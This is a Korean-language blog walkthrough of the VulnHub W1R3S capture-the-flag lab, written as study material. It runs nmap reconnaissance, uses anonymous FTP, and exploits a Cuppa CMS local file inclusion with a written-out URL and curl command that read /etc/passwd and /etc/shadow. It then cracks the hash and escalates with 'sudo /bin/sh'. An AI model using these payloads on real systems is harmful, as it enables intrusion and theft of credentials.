먼저 해당랩에 아이피부터 수집하겠습니다
arp-scan -l
nmap 포트스캔을 해주겠습니다
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -sV -P -T4 192.168.190.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-16 06:22 EST
Nmap scan report for 192.168.190.133
Host is up (0.0016s latency).
Not shown: 966 filtered tcp ports (no-response), 30 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.190.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:21:F8:5E (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 5.1 - 5.15 (96%), Linux 3.2 - 4.14 (94%), Linux 3.13 - 4.4 (94%), Linux 4.10 (94%), Linux 4.4 (93%), Linux 3.10 (92%), Linux 3.16 - 4.6 (92%), Linux 2.6.32 - 3.13 (91%), Linux 5.0 - 5.14 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.57 ms 192.168.190.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.32 seconds21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
열린 포트들
Apache 서버부터 보겠습니다
gobuster 를 통하여 숨겨진 경로를 스캔해주겠습니다
해당 /administrator 경로로 진입해보겠습니다
음 일단 뭔지 몰라서 이것저것 건드려 봤는데 특별한건 없는거 같았습니다
일단 Name 이 admin 인걸 알아냈습니다
ssh 로그인 시도를 해보겠습니다
일단 비밀번호는 현재 모르니깐 스킵
전에 21 포트에 ftp 서버가 열려있으며 익명 로그인이 허용되여있는걸 알아냈습니다
ftp 서버에 로그인 해보겠습니다
ftp 192.168.190.133
get 으로 텍스트 파일 모두 다운로드 해줍시다
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
음 base64 로 인코딩 된걸 디코딩 했더만 특별한건 없네요
01ec2d8fc11c493b25029fb1f47f39ce
해시값으로 된 문자열또한 발견했는데 일단 좀더 정찰 해보겠습니다
다른것도 다운로드 해줍시다
개발자 인원 같은게 보입니다
다시 /admininistrator 경로로 진입하여 확인해줍시다
현재 해당 서버는 Cuppa CMS 를 사용중입니다
searchsploit 을 사용해 cuppa cms 취약점을 찾아줍시다
https://www.exploit-db.com/exploits/25971
Exploit
공격자는 이 취약점을 통해 로컬 또는 원격 PHP 파일을 포함시키거나 PHP가 아닌 파일을 읽을 수 있습니다. 사용자가 감염시킨 데이터는 현재 파일에 포함될 파일 이름을 생성할 때 사용됩니다. 이 파일의 PHP 코드가 평가되고, PHP가 아닌 코드는 출력 결과에 포함됩니다. 이 취약점은 서버 전체의 보안 침해로 이어질 수 있습니다.
쉽게 말해 lfi 공격을 시도하여 서버가 의도치 않은 행동을 하게 할수 있다는 말인거 같습니다
http://192.168.190.133/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
/etc/passwd 경로로 성공적으로 진입했습니다
해당 /etc/passwd 내용을 보기 위해선 curl 를 사용해야되는걸 알아냈습니다
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.190.133/administrator/alerts/alertConfigField.php
해당 /etc/shadow 내용중
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
해당 문자열을 알아냈습니다
해당 문자열은 Hash 로 암호화 되여있기 때문에 우리는 이것을 크랙해줘야만 합니다.
computer (?)
크랙에 성공했습니다
ssh 에 로그인 해봅시다
권한상승
sudo /bin/sh
성공적으로 해당 플레그를 쉽게 얻어냈습니다
여기까지 봐주셔서 감사합니다
'VulnHub' 카테고리의 다른 글
| VulnHub | LazySysAdmin: 1 - 모의해킹 (0) | 2025.11.16 |
|---|---|
| VulnHub | Lord Of The Root - 모의해킹 (0) | 2025.11.16 |
| VulnHub | Tr0ll - 모의해킹 (0) | 2025.11.16 |
| VulnHub | Mr-Robot 1 - 모의해킹 (0) | 2025.01.12 |
| VulnHub | Basic Pentesting 2 - 모의해킹 (0) | 2025.01.11 |